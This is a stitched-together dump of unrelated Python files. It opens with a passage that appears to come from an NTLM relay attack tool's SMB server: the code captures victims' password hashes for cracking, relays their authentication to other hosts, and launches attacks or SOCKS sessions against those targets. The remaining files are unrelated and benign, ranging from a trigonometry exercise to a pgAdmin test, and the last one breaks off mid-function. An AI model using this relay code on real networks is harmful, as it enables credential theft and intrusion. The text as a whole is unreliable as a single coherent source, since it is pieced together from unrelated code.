client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
self.do_attack(client)
# Now continue with the server
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegState'] = b'\x00'
# Done with the relay for now.
connData['Authenticated'] = True
del(connData['relayToHost'])
# Status SUCCESS
errorCode = STATUS_SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
#TODO: Fix this for other protocols than SMB [!]
respParameters = smb.SMBSessionSetupAndXResponse_Parameters()
respData = smb.SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(SMBCommand['Data'])
client = connData['SMBClient']
_, errorCode = client.sendStandardSecurityAuth(sessionSetupData)
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = smb.NewSMBPacket()
packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
#Log this target as processed for this client
self.targetprocessor.logTarget(self.target)
# Finish client's connection
#client.killConnection()
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
self.authUser = ('%s/%s' % (sessionSetupData['PrimaryDomain'], sessionSetupData['Account'])).upper()
LOG.info("Authenticating against %s://%s as %s SUCCEED" % (self.target.scheme, self.target.netloc, self.authUser))
# Log this target as processed for this client
self.targetprocessor.logTarget(self.target, True, self.authUser)
ntlm_hash_data = outputToJohnFormat('', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Done with the relay for now.
connData['Authenticated'] = True
del(connData['relayToHost'])
self.do_attack(client)
# Now continue with the server
#############################################################
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
authenticateMessage = connData['AUTHENTICATE_MESSAGE']
self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode ('utf-16le'),
authenticateMessage['user_name'].decode ('utf-16le'))).upper ()
# Uncommenting this will stop at the first connection relayed and won't relaying until all targets
# are processed. There might be a use case for this
#if 'relayToHost' in connData:
# # Connection already relayed, let's just answer the request (that will return object not found)
# return self.smbComTreeConnectAndX(connId, smbServer, SMBCommand, recvPacket)
try:
if self.config.mode.upper () == 'REFLECTION':
self.targetprocessor = TargetsProcessor (singleTarget='SMB://%s:445/' % connData['ClientIP'])
if self.authUser == '/':
LOG.info('SMBD-%s: Connection from %s authenticated as guest (anonymous). Skipping target selection.' %
(connId, connData['ClientIP']))
return self.origsmbComTreeConnectAndX (connId, smbServer, recvPacket)
self.target = self.targetprocessor.getTarget(identity = self.authUser)
if self.target is None:
# No more targets to process, just let the victim to fail later
LOG.info('SMBD-%s: Connection from %s@%s controlled, but there are no more targets left!' %
(connId, self.authUser, connData['ClientIP']))
return self.origsmbComTreeConnectAndX (connId, smbServer, recvPacket)
LOG.info('SMBD-%s: Connection from %s@%s controlled, attacking target %s://%s' % ( connId, self.authUser,
connData['ClientIP'], self.target.scheme, self.target.netloc))
if self.config.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
LOG.debug("Downgrading to standard security")
extSec = False
recvPacket['Flags2'] += (~smb.SMB.FLAGS2_EXTENDED_SECURITY)
else:
extSec = True
# Init the correct client for our target
client = self.init_client(extSec)
except Exception as e:
LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
self.targetprocessor.logTarget(self.target)
else:
connData['relayToHost'] = True
connData['Authenticated'] = False
del (connData['NEGOTIATE_MESSAGE'])
del (connData['CHALLENGE_MESSAGE'])
del (connData['AUTHENTICATE_MESSAGE'])
connData['SMBClient'] = client
connData['EncryptionKey'] = client.getStandardSecurityChallenge()
smbServer.setConnectionData(connId, connData)
resp = smb.NewSMBPacket()
resp['Flags1'] = smb.SMB.FLAGS1_REPLY
resp['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | \
recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Pid'] = connData['Pid']
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX)
respParameters = smb.SMBTreeConnectAndXResponse_Parameters()
respData = smb.SMBTreeConnectAndXResponse_Data()
treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters'])
if treeConnectAndXParameters['Flags'] & 0x8:
respParameters = smb.SMBTreeConnectAndXExtendedResponse_Parameters()
treeConnectAndXData = smb.SMBTreeConnectAndX_Data( flags = recvPacket['Flags2'] )
treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength']
treeConnectAndXData.fromString(SMBCommand['Data'])
## Process here the request, does the share exist?
UNCOrShare = decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# This is the key, force the client to reconnect.
# It will loop until all targets are processed for this user
errorCode = STATUS_NETWORK_SESSION_EXPIRED
resp['ErrorCode'] = errorCode >> 16
resp['_reserved'] = 0o3
resp['ErrorClass'] = errorCode & 0xff
if path == 'IPC$':
respData['Service'] = 'IPC'
else:
respData['Service'] = path
respData['PadLen'] = 0
respData['NativeFileSystem'] = encodeSMBString(recvPacket['Flags2'], 'NTFS' )
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp['Uid'] = connData['Uid']
resp.addCommand(respSMBCommand)
smbServer.setConnectionData(connId, connData)
return None, [resp], errorCode
################################################################################
#Initialize the correct client for the relay target
def init_client(self,extSec):
if self.target.scheme.upper() in self.config.protocolClients:
client = self.config.protocolClients[self.target.scheme.upper()](self.config, self.target, extendedSecurity = extSec)
client.initConnection()
else:
raise Exception('Protocol Client for %s not found!' % self.target.scheme)
return client
def do_ntlm_negotiate(self,client,token):
#Since the clients all support the same operations there is no target protocol specific code needed for now
return client.sendNegotiate(token)
def do_ntlm_auth(self,client,SPNEGO_token,challenge):
#The NTLM blob is packed in a SPNEGO packet, extract it for methods other than SMB
clientResponse, errorCode = client.sendAuth(SPNEGO_token, challenge)
return clientResponse, errorCode
def do_attack(self,client):
#Do attack. Note that unlike the HTTP server, the config entries are stored in the current object and not in any of its properties
# Check if SOCKS is enabled and if we support the target scheme
if self.config.runSocks and self.target.scheme.upper() in self.config.socksServer.supportedSchemes:
if self.config.runSocks is True:
# Pass all the data to the socksplugins proxy
activeConnections.put((self.target.hostname, client.targetPort, self.target.scheme.upper(),
self.authUser, client, client.sessionData))
return
# If SOCKS is not enabled, or not supported for this scheme, fall back to "classic" attacks
if self.target.scheme.upper() in self.config.attacks:
# We have an attack.. go for it
clientThread = self.config.attacks[self.target.scheme.upper()](self.config, client.session, self.authUser)
clientThread.start()
else:
LOG.error('No attack configured for %s' % self.target.scheme.upper())
def _start(self):
self.server.daemon_threads=True
self.server.serve_forever()
LOG.info('Shutting down SMB Server')
self.server.server_close()
def run(self):
LOG.info("Setting up SMB Server")
self._start()
|
# Faça um programa que leia um ângulo qualquer e
# mostre na tela o valor do seno, cosseno e tangente
# desse ângulo.
import math
angulo = float(input('Digite o ângulo que você deseja: '))
seno = math.sin(math.radians(angulo))
cosseno = math.cos(math.radians(angulo))
tangente = math.tan(math.radians(angulo))
print('O ângulo de {} tem o SENO de {:.2f}'.format(angulo, seno))
print('O ângulo de {} tem o COSSENO de {:.2f}'.format(angulo, cosseno))
print('O ângulo de {} tem a TANGENTE de {:.2f}'.format(angulo, tangente))
|
'''
Creación BBDD a través de peewee
'''
import peewee
db = peewee.SqliteDatabase('aceites.db')
class DB(peewee.Model):
class Meta:
database = db
|
from huobi import RequestClient
from datetime import datetime
from huobi.model import *
import talib
import numpy as np
import matplotlib.pyplot as plt
from huobi.model.bararray import BarArray
from huobi.model.tradeinfoarray import TradeInfoArray
from huobi.impl.utils.emailsender import MyEmailContent
request_client = RequestClient()
dd = MyEmailContent()
# ########## 1 min data ############
candlestick_list_1 = request_client.get_candlestick("BTC_CQ", CandlestickInterval.MIN1, 100)
am_1 = BarArray()
am_1.update_candle(candlestick_list_1)
boll_1 = TradeInfoArray(1)
boll_1.update_boll_array(candlestick_list_1, am_1)
# ########## 5 min data ############
ttsi_5 = request_client.get_ttsi('BTC', '5min')
ttmu_5 = request_client.get_ttmu('BTC', '5min')
candlestick_list_5 = request_client.get_candlestick("BTC_CQ", CandlestickInterval.MIN5, 100)
am_5 = BarArray()
am_5.update_candle(candlestick_list_5)
boll_5 = TradeInfoArray(1)
boll_5.update_ttmu(ttmu_5)
boll_5.update_ttsi(ttsi_5)
boll_5.update_boll_array(candlestick_list_5, am_5)
# ########## 15 min data ############
ttsi_15 = request_client.get_ttsi('BTC', '15min')
ttmu_15 = request_client.get_ttmu('BTC', '15min')
candlestick_list_15 = request_client.get_candlestick("BTC_CQ", CandlestickInterval.MIN15, 100)
am_15 = BarArray()
am_15.update_candle(candlestick_list_15)
boll_15 = TradeInfoArray(1)
boll_15.update_ttmu(ttmu_15)
boll_15.update_ttsi(ttsi_15)
boll_15.update_boll_array(candlestick_list_15, am_15)
# ########## 30 min data ############
ttsi_30 = request_client.get_ttsi('BTC', '30min')
ttmu_30 = request_client.get_ttmu('BTC', '30min')
candlestick_list_30 = request_client.get_candlestick("BTC_CQ", CandlestickInterval.MIN30, 100)
am_30 = BarArray()
am_30.update_candle(candlestick_list_30)
boll_30 = TradeInfoArray(1)
boll_30.update_ttmu(ttmu_30)
boll_30.update_ttsi(ttsi_30)
boll_30.update_boll_array(candlestick_list_30, am_30)
# ########## 60 min data ############
ttsi_60 = request_client.get_ttsi('BTC', '60min')
ttmu_60 = request_client.get_ttmu('BTC', '60min')
pos_60 = request_client.get_position('BTC', 'quarter', '60min', '48', '1')
candlestick_list_60 = request_client.get_candlestick("BTC_CQ", CandlestickInterval.MIN60, 100)
am_60 = BarArray()
am_60.update_candle(candlestick_list_60)
boll_60 = TradeInfoArray(1)
boll_60.update_all(ttsi_60, ttmu_60, pos_60, candlestick_list_60, am_60)
# ########## 4 hours ############
ttsi_4h = request_client.get_ttsi('BTC', '4hour')
ttmu_4h = request_client.get_ttmu('BTC', '4hour')
pos_4h = request_client.get_position('BTC', 'quarter', '4hour', '48', '1')
candlestick_list_4h = request_client.get_candlestick("BTC_CQ", CandlestickInterval.HOUR4, 100)
am_4h = BarArray()
am_4h.update_candle(candlestick_list_4h)
boll_4h = TradeInfoArray(1)
boll_4h.update_all(ttsi_4h, ttmu_4h, pos_4h, candlestick_list_4h, am_4h)
# ########## 1d min data ############
ttsi_1d = request_client.get_ttsi('BTC', '1day')
ttmu_1d = request_client.get_ttmu('BTC', '1day')
pos_1d = request_client.get_position('BTC', 'quarter', '1day', '48', '1')
candlestick_list_1d = request_client.get_candlestick("BTC_CQ", CandlestickInterval.DAY1, 100)
am_1d = BarArray()
am_1d.update_candle(candlestick_list_1d)
boll_1d = TradeInfoArray(1)
boll_1d.update_all(ttsi_1d, ttmu_1d, pos_1d, candlestick_list_1d, am_1d)
# ####### generating report #######
dd.generate_report(am_1, boll_1, '1 min')
dd.generate_report(am_5, boll_5, '5 min')
dd.generate_report(am_15, boll_15, '15 min')
dd.generate_report(am_30, boll_30, '30 min')
dd.generate_report(am_60, boll_60, '60 min')
dd.generate_report(am_4h, boll_4h, '4 hours')
dd.generate_report(am_1d, boll_1d, '1d')
if dd.send_flag == 1:
dd.get_msg()
dd.sendmail('情况汇报', dd.to_str())
# x = np.arange(80, 100)
# fig, ax1 = plt.subplots()
# ax2 = ax1.twinx()
# ax1.plot(x, boll_60.ttmu_buy_ratio[-20:], 'ro-', label="TTMU 1day")
# ax1.plot(x, boll_60.ttsi_buy_ratio[-20:], 'g+-', label="TTSI 1day")
# ax2.plot(x, boll_60.market_position[-20:], 'y+-', label="Position 1day")
# ax1.legend(loc=0)
# ax2.legend(loc=0)
# plt.title('RSI chart')
# plt.xlabel('Time')
# plt.ylabel('RSI')
# plt.legend()
# plt.show()
# plt.savefig("d:/cv/image_2.png")
# plt.close()
# dd.sendmail('情况汇报', dd.to_str())
|
__all__ = ["time_rule", "quant_quest_time_rule", "us_time_rule", "nse_time_rule", "custom_time_rule"]
|
import logging
from logging.handlers import RotatingFileHandler
FALLBACK_FORMAT = '%(asctime)s [%(levelname)s] %(process)d#%(thread)d: %(name)s - %(message)s'
def init_logger(app, logger):
level = getattr(logging, app.config['LOG_LEVEL'].upper())
file_name = app.config['LOG_FILE_NAME']
max_bytes = app.config['LOG_FILE_MAX_SIZE']
backup_count = app.config['LOG_FILE_BACKUP_COUNT']
logger.setLevel = level
try:
handler = RotatingFileHandler(file_name, maxBytes=max_bytes, backupCount=backup_count)
except:
handler = logging.StreamHandler()
formatter = logging.Formatter(FALLBACK_FORMAT)
handler.setFormatter(formatter)
handler.setLevel(level)
logger.addHandler(handler)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
# Export this package's modules as members:
from ._enums import *
from .get_guest_configuration_assignment import *
from .get_guest_configuration_hcrpassignment import *
from .guest_configuration_assignment import *
from .guest_configuration_hcrpassignment import *
from ._inputs import *
from . import outputs
def _register_module():
import pulumi
from ... import _utilities
class Module(pulumi.runtime.ResourceModule):
_version = _utilities.get_semver_version()
def version(self):
return Module._version
def construct(self, name: str, typ: str, urn: str) -> pulumi.Resource:
if typ == "azure-native:guestconfiguration/latest:GuestConfigurationAssignment":
return GuestConfigurationAssignment(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:guestconfiguration/latest:GuestConfigurationHCRPAssignment":
return GuestConfigurationHCRPAssignment(name, pulumi.ResourceOptions(urn=urn))
else:
raise Exception(f"unknown resource type {typ}")
_module_instance = Module()
pulumi.runtime.register_resource_module("azure-native", "guestconfiguration/latest", _module_instance)
_register_module()
|
"""
Define a function that can accept two strings as input and concatenate them and then print it in console.
"""
"""Question:
Define a function that can accept two strings as input and concatenate them and then print it in console.
Hints:
Use + to concatenate the strings
"""
def printValue(s1,s2):
print s1+s2
printValue("3","4") #34
|
##########################################################################
#
# pgAdmin 4 - PostgreSQL Tools
#
# Copyright (C) 2013 - 2020, The pgAdmin Development Team
# This software is released under the PostgreSQL Licence
#
##########################################################################
from __future__ import print_function
import json
import uuid
from pgadmin.browser.server_groups.servers.databases.schemas.tests import \
utils as schema_utils
from pgadmin.browser.server_groups.servers.databases.tests import \
utils as database_utils
from pgadmin.utils.route import BaseTestGenerator
from regression import parent_node_dict
from regression.python_test_utils import test_utils as utils
from . import utils as fts_temp_utils
class FtsTemplateAddTestCase(BaseTestGenerator):
""" This class will add new FTS template under test schema. """
scenarios = [
# Fetching default URL for FTS template node.
(
'Fetch FTS templates Node URL',
dict(url='/browser/fts_template/obj/'))
]
def runTest(self):
""" This function will add FTS template present under
test schema. """
self.schema_data = parent_node_dict['schema'][-1]
self.schema_name = self.schema_data['schema_name']
self.schema_id = self.schema_data['schema_id']
self.server_id = self.schema_data['server_id']
self.db_id = self.schema_data['db_id']
self.db_name = parent_node_dict["database"][-1]["db_name"]
db_con = database_utils.connect_database(self,
utils.SERVER_GROUP,
self.server_id,
self.db_id)
if not db_con["info"] == "Database connected.":
raise Exception("Could not connect to database.")
schema_response = schema_utils.verify_schemas(self.server,
self.db_name,
self.schema_name)
if not schema_response:
raise Exception("Could not find the schema.")
self.fts_template_name = "fts_temp_%s" % str(uuid.uuid4())[1:8]
self.data = \
{
"name": self.fts_template_name,
"schema": self.schema_id,
"tmplinit": "dispell_init",
"tmpllexize": "dispell_lexize"
}
response = self.tester.post(
self.url + str(utils.SERVER_GROUP) + '/' +
str(self.server_id) + '/' + str(self.db_id) +
'/' + str(self.schema_id) + '/',
data=json.dumps(self.data),
content_type='html/json')
self.assertEquals(response.status_code, 200)
def tearDown(self):
"""This function delete the fts_template and disconnect the test
database."""
fts_temp_utils.delete_fts_template(self.server, self.db_name,
self.schema_name,
self.fts_template_name)
database_utils.disconnect_database(self, self.server_id,
self.db_id)
|
# -*- coding: utf-8 -*-
import os
import numpy as np
import rstr
from dfa import DFA
def gen_dataset(fname):
with open(os.path.expanduser(fname), 'r') as f:
str_dataset = f.read()
dict_dataset = {}
cur_id = '0'
fl = []
for r in str_dataset.split('\n'):
if r == '':
dict_dataset[cur_id] = fl
break
id, fr = r.split(' ')
if id == cur_id:
fl.append(fr)
else:
dict_dataset[cur_id] = fl
fl = [fr]
cur_id = id
return dict_dataset
def gen_fake(n_total=4039, n_genuines=1399):
total = np.arange(n_total)
genuines = np.random.choice(total, size=n_genuines, replace=False)
fakes = total[np.in1d(total, genuines, invert=True)]
return genuines, fakes
def friend_pattern(px_friend_list, genuine_ix):
new_friend_list = []
n_genuines = 0
n_genuines = []
# n_fakes = 0
n_fakes = []
genuine_fp = '(a|b)*a#' # Facebook FP
fake_fp = '(a*|b)(b|ab*a)#'
for i, inst in enumerate(px_friend_list):
if int(inst) in genuine_ix:
fp_to_use = genuine_fp
# n_genuines += 1
n_genuines.append('genuine')
else:
fp_to_use = fake_fp
# n_fakes += 1
n_fakes.append('fake')
while True:
fp = rstr.xeger(fp_to_use)
if fp not in new_friend_list:
break
new_friend_list.append(fp)
return new_friend_list, n_genuines, n_fakes
class FacebookIPR(object):
def __init__(self, ):
""""""
ipr = DFA(alphabet=['a', 'b', '#'])
# States
ipr.add_state(initial=True) # q_0
ipr.add_state() # q_1
ipr.add_state() # q_2
ipr.add_state(accept=True) # q_3
# Transitions
ipr.add_transition('q_0', 'q_1', 'a')
ipr.add_transition('q_0', 'q_1', 'b')
ipr.add_transition('q_1', 'q_2', 'a')
ipr.add_transition('q_1', 'q_1', 'b')
ipr.add_transition('q_2', 'q_2', 'a')
ipr.add_transition('q_2', 'q_1', 'b')
ipr.add_transition('q_2', 'q_3', '#')
self.dfa = ipr
def check_profile(self, profile):
return self.dfa.process_sequence(profile, verbose=False)
if __name__ == '__main__':
fname = '~/Downloads/facebook_combined.txt'
fb_ipr = FacebookIPR()
ds = gen_dataset(fname)
genuine_ix, fake_ix = gen_fake()
test_genuine_count = 0
y_test = []
test_fake_count = 0
genuine_count = 0
y_pred = []
fake_count = 0
for i, (px, fl) in enumerate(ds.items()):
# print('Working on profile px = {}'.format(px))
fl_intances, n_g, n_f = friend_pattern(ds[px], genuine_ix)
test_genuine_count += len(n_g)
test_fake_count += len(n_f)
y_test.extend(n_g)
y_test.extend(n_f)
for px_i, ix in enumerate(fl_intances):
if fb_ipr.check_profile(ix):
genuine_count += 1
y_pred.append('genuine')
else:
fake_count += 1
y_pred.append('fake')
if i == 50:
break
print('Number of test genuine profiles: {}'.format(test_genuine_count))
print('Number of predicted genuine profiles: {}'.format(genuine_count))
print('Number of test fake profiles: {}'.format(test_fake_count))
print('Number of predicted fake profiles: {}'.format(fake_count))
print('done.')
|
from ctypes import Structure, POINTER, c_char_p, c_int
from .dll import _bind
from .stdinc import Uint8
__all__ = ["SDL_version", "SDL_MAJOR_VERSION", "SDL_MINOR_VERSION",
"SDL_PATCHLEVEL", "SDL_VERSION", "SDL_VERSIONNUM",
"SDL_COMPILEDVERSION", "SDL_VERSION_ATLEAST", "SDL_GetVersion",
"SDL_GetRevision", "SDL_GetRevisionNumber"
]
class SDL_version(Structure):
_fields_ = [("major", Uint8),
("minor", Uint8),
("patch", Uint8),
]
SDL_MAJOR_VERSION = 2
SDL_MINOR_VERSION = 0
SDL_PATCHLEVEL = 5
def SDL_VERSION(x):
x.major = SDL_MAJOR_VERSION
x.minor = SDL_MINOR_VERSION
x.patch = SDL_PATCHLEVEL
SDL_VERSIONNUM = lambda x, y, z: (x * 1000 + y * 100 + z)
SDL_COMPILEDVERSION = SDL_VERSIONNUM(SDL_MAJOR_VERSION, SDL_MINOR_VERSION, SDL_PATCHLEVEL)
SDL_VERSION_ATLEAST = lambda x, y, z: (SDL_COMPILEDVERSION >= SDL_VERSIONNUM(x, y, z))
SDL_GetVersion = _bind("SDL_GetVersion", [POINTER(SDL_version)])
SDL_GetRevision = _bind("SDL_GetRevision", None, c_char_p)
SDL_GetRevisionNumber = _bind("SDL_GetRevisionNumber", None, c_int)
|
# https://packaging.python.org/tutorials/packaging-projects/
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="example-pkg-YOUR-USERNAME-HERE", # Replace with your own username
version="0.0.1",
author="Example Author",
author_email="author@example.com",
description="A small example package",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/pypa/sampleproject",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
)
|
from collections import namedtuple
from itertools import count
from glob import glob
from time import time, sleep
from .synthesis import Synthesis
from .utils import Fold
from .kmerSetDB import kmerSetDB
from .kmerSetArray import kmerSetArray
import sys
import numpy
import uuid
import math
import textwrap
from . import utils
from . import makerchecks
from . import projector
from . import berno
from . import finder
from Bio.SeqUtils import MeltingTemp
class NRPMaker(object):
def __init__(self, part_type='RNA', seed=None):
# Instance variables
self.part_type = part_type
self.synthesis = Synthesis()
self.fold = Fold(part_type=part_type)
self.proj_id = str(uuid.uuid4())
self.kmer_db = None
self.background = None
# Seed the RNG
if not seed is None and isinstance(seed, int):
self.rng = numpy.random.default_rng(seed=seed)
else:
self.rng = numpy.random.default_rng()
# Lookup tables
if self.part_type == 'RNA':
self.iupac_space = {
'A': {'A'},
'C': {'C'},
'G': {'G'},
'U': {'U'},
'R': {'A', 'G'},
'Y': {'C', 'U'},
'S': {'G', 'C'},
'W': {'A', 'U'},
'K': {'G', 'U'},
'M': {'A', 'C'},
'B': {'C', 'G', 'U'},
'V': {'A', 'C', 'G'},
'D': {'A', 'G', 'U'},
'H': {'A', 'C', 'U'},
'N': {'A', 'U', 'G', 'C'}
}
self.iupac_compl = {
'A': 'U', # A - U
'C': 'G', # C - G
'G': 'Y', # G - C U - Y
'U': 'R', # U - A G - R
'R': 'Y', # R - A G - U C - Y
'Y': 'R', # Y - C U - G A G - R
'S': 'B', # S - G C - C G U - B
'W': 'D', # W - A U - U A G - D
'K': 'N', # K - G U - C U G A
'M': 'K', # M - A C - U G - K
'B': 'N', # B - C G U - G C U A - N
'V': 'D', # V - A C G - U G A - D
'D': 'N', # D - A G U - U C A G - N
'H': 'N', # H - A C U - U G A G - N
'N': 'N'
}
self.base_compl = {
'A': ['U'],
'G': ['C', 'U'],
'C': ['G'],
'U': ['A', 'G']
}
else:
self.iupac_space = {
'A': {'A'},
'C': {'C'},
'G': {'G'},
'T': {'T'},
'R': {'A', 'G'},
'Y': {'C', 'T'},
'S': {'G', 'C'},
'W': {'A', 'T'},
'K': {'G', 'T'},
'M': {'A', 'C'},
'B': {'C', 'G', 'T'},
'V': {'A', 'C', 'G'},
'D': {'A', 'G', 'T'},
'H': {'A', 'C', 'T'},
'N': {'A', 'T', 'G', 'C'}
}
self.iupac_compl = {
'A': 'T', # A - T
'C': 'G', # C - G
'G': 'C', # G - C
'T': 'A', # T - A
'R': 'Y', # R - A G - T C - Y
'Y': 'R', # Y - C T - G A - R
'S': 'S', # S - G C - C G - S
'W': 'W', # W - A T - T A - W
'K': 'M', # K - G T - C A - M
'M': 'K', # M - A C - T G - K
'B': 'V', # B - C G T - G C A - V
'V': 'B', # V - A C G - T G C - B
'D': 'H', # D - A G T - T C A - H
'H': 'D', # H - A C T - T G A - D
'N': 'N'
}
self.base_compl = {
'A': ['T'],
'G': ['C'],
'C': ['G'],
'T': ['A']
}
def _get_adjusted_struct(self, struct, seq):
if struct is None:
return '.'*len(seq)
elif len(seq) < len(struct):
return struct[:len(seq)]
elif len(seq) > len(struct):
return ''.join([struct, '.'*(len(seq) - len(struct))])
return struct
def _get_meta_struct(self, struct):
struct_spec = namedtuple(
'struct_spec', 'struct paired_dict rev_paired_dict unpaired_set folding inversefolding')
pairing_stack = []
meta_struct = struct_spec(
struct=struct.replace('x', '.'),
paired_dict={},
rev_paired_dict={},
unpaired_set=set(),
folding={},
inversefolding={})
for index, nt in enumerate(struct):
if nt == '(':
pairing_stack.append(index)
elif nt == ')':
try:
closure = pairing_stack.pop()
except:
raise ValueError(
' [X] Unbalanced parentheses in structure constraint')
meta_struct.paired_dict[closure] = index
meta_struct.rev_paired_dict[index] = closure
elif nt == 'x':
meta_struct.unpaired_set.add(index)
if pairing_stack:
raise ValueError(
' [X] Unbalanced parentheses in structure constraint')
if meta_struct.paired_dict:
meta_struct.folding['status'] = True
meta_struct.inversefolding['status'] = True
elif meta_struct.unpaired_set:
meta_struct.folding['status'] = True
meta_struct.inversefolding['status'] = False
else:
meta_struct.folding['status'] = False
meta_struct.inversefolding['status'] = False
return meta_struct
def _get_meta_seq(self, seq, meta_struct):
seq = list(seq)
meta_seq = [None] * len(seq)
# Normalize Meta Sequence
for i in range(len(seq)):
try:
if i in meta_struct.paired_dict:
j = meta_struct.paired_dict[i]
if len(self.iupac_space[seq[j]]) < len(self.iupac_space[seq[i]]):
seq[i] = self.iupac_compl[seq[j]]
elif len(self.iupac_space[seq[i]]) < len(self.iupac_space[seq[j]]):
seq[j] = self.iupac_compl[seq[i]]
meta_seq[i] = set(self.iupac_space[seq[i]])
except:
raise ValueError(
' [X] Invalid IUPAC code at index {} in sequence constraint'.format(i))
return tuple(meta_seq)
def _reset_candidate_kmer_set(
self,
candidate,
kmer_set,
i):
candidate[i] = '-'
kmer_set[i] = ' '
def _clear_path(
self,
candidate,
tried_set,
kmer_set,
i,
k):
j = i
while j > k:
self._reset_candidate_kmer_set(
candidate,
kmer_set,
j)
tried_set[j] = set()
# tried_set[j] = set(candidate[j])
j -= 1
else:
self._reset_candidate_kmer_set(
candidate,
kmer_set,
j)
i = j
return i
def _get_rollback_index(
self,
meta_seq,
meta_struct,
i,
homology,
candidate,
tried_set):
roll_back_index = None
# See if any position in last homology places has potential for change
j = i
while (j >= i - homology + 1) and (j >= 0):
# Case ( or . with potential for change
if not (j in meta_struct.rev_paired_dict):
if len(meta_seq[j]) > len(tried_set[j]):
roll_back_index = j
break
# Case ) for RNA Parts with potential for change
else:
l = meta_struct.rev_paired_dict[j]
pnt = meta_seq[j]
pnt = pnt.intersection(
self.base_compl[candidate[l]])
if len(tried_set[j]) < len(pnt):
roll_back_index = j
break
j -= 1
# Else go to the ( for the first ) in the last homology places
if not roll_back_index:
j = max(0, i - homology + 1)
k = None
while j <= i:
if j in meta_struct.rev_paired_dict:
k = j
break
j += 1
roll_back_index = meta_struct.rev_paired_dict[k]
return roll_back_index
def _roll_back(
self,
meta_seq,
meta_struct,
i,
homology,
candidate,
tried_set,
kmer_set,
rbi=None):
# Default Case: Explicit roll back
if not rbi is None:
# traceback to ( if corresponding ) given
if rbi in meta_struct.rev_paired_dict:
j = meta_struct.rev_paired_dict[rbi]
pnt = meta_seq[rbi]
pnt = pnt.intersection(
self.base_compl[candidate[j]])
# No potential for change
if len(pnt) == len(tried_set[i]):
rbi = j
self._clear_path(
candidate, tried_set, kmer_set, i, k=rbi)
return rbi
# Case 1: i is not paired upstream
if not i in meta_struct.rev_paired_dict:
self._reset_candidate_kmer_set(
candidate, kmer_set, i)
# Case 2: i is paired upstream
else:
roll_back_index = self._get_rollback_index(
meta_seq, meta_struct, i, homology, candidate, tried_set)
i = self._clear_path(
candidate, tried_set, kmer_set, i, k=roll_back_index)
return i
def _get_local_roll_back_index(
self,
candidate,
i,
local_model_fn,
verbose):
# Prep candidate
candidate_str = ''.join(candidate)
candidate_str = candidate_str[:i+1]
# Try to evaluate the local_model_fn on candidate_str
outcome = True
try:
outcome = local_model_fn(candidate_str)
if outcome in [True, False]:
state, index = outcome, i
else:
state, index = outcome
except Exception as e:
print(' Local Model fn. failed to evaluate partial path: {}\n'.format(
candidate_str))
raise e # No intelligence, halt everything!
# State satisfactory?
try:
assert state in [True, False]
except Exception as e:
print(' Local Model fn. failed to evaluate partial path: {}'.format(
candidate_str))
